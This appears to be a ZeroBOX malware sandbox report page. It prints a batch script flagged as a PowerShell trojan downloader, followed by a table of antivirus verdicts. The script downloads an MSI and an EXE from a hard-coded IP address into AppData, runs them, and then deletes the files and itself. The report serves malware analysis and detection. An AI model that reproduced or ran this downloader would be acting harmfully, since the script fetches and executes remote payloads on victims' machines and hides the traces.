popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
@echo off
cd %appdata%\Microsoft\Templates
Powershell -Command "Invoke-WebRequest 'http://54.177.246.246/t.msi' -OutFile pearl.msi"
Powershell -Command "Invoke-WebRequest 'http://54.177.246.246/a.exe' -OutFile nora.exe"
cd %appdata%\Microsoft\Templates
.\nora.exe 41 %appdata%\Microsoft\Templates\pearl.msi
timeout /t 30 /nobreak
cd %appdata%\Microsoft\Templates
Powershell -Command "Remove-Item 'nora.exe'"
Powershell -Command "Remove-Item 'pearl.msi'"
cd %appdata%
Powershell -Command "Remove-Item 'C:\Users\user\AppData\Roaming\run.vbs'"
del %0
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDownloader.Agent.GPX
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Rising Clean
Sophos Clean
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Emsisoft Clean
Ikarus Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
MAX Clean
MaxSecure Clean
Fortinet Clean
AVG Clean
Panda Clean
No IRMA results available.